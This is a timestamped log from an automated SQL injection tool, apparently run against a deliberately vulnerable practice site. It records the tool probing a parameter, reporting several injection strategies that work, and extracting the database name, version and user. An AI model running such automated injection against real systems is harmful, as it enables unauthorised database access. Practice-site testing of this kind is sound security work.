[16:15:38,011] Starting new injection: http://testphp.vulnweb.com/listproducts.php?cat=1
[16:15:38,011] Connection test...
[16:15:38,198] Found status HTTP 200 Success
[16:15:38,292] Found 1 <form> in HTML body while status 200 Success:
<form action="search.php?test=query" method="post" />
    <input name="searchFor" value="" />
    <input name="goButton" value="go" />
[16:15:38,308] Checking insertion characters...
[16:15:38,448] Found character insertion [-1] in place of [1] to detect error on ORDER BY
[16:15:38,448] Add manually the character * like [1*] to force the value [1]
[16:15:38,448] Using insertion character [-1]
[16:15:38,713] Found database [MySQL]
[16:15:38,713] Using database [MySQL]
[16:15:38,713] Checking strategy Time...
[16:15:39,195] Checking strategy Blind...
[16:15:40,163] Checking strategy Error...
[16:15:40,163] Checking BIGINT::exp...
[16:15:40,350] Checking BIGINT::exp in Order By...
[16:15:40,537] Checking BIGINT::exp in Delete Update Insert...
[16:15:40,646] Checking DOUBLE::exp...
[16:15:40,835] Checking DOUBLE::exp in Order By...
[16:15:41,025] Checking DOUBLE::exp in Delete Update Insert...
[16:15:41,134] Checking GROUPBY::floor_rand...
[16:15:41,415] Vulnerable to GROUPBY::floor_rand using 60 characters
[16:15:41,415] Checking GROUPBY::floor_rand in Order By...
[16:15:41,602] Checking GROUPBY::floor_rand in Delete Insert Update...
[16:15:41,711] Checking JSON::json_keys...
[16:15:41,900] Checking JSON::json_keys in Order By...
[16:15:42,090] Checking JSON::json_keys in Delete Insert Update...
[16:15:42,199] Checking XML::extractvalue...
[16:15:42,573] Vulnerable to XML::extractvalue using 27 characters
[16:15:42,573] Checking XML::extractvalue in Order By...
[16:15:42,771] Checking XML::extractvalue in Delete Insert Update...
[16:15:42,865] Checking strategy Normal...
[16:15:44,770] Vulnerable to Normal injection using 90810 characters
[16:15:44,770] Using strategy [Normal]
[16:15:44,770] Fetching informations...
[16:15:44,958] Database [acuart] on MySQL [5.1.73-0ubuntu0.10.04.1] for user [acuart@localhost]
[16:15:44,958] Fetching databases...
[16:15:45,257] Done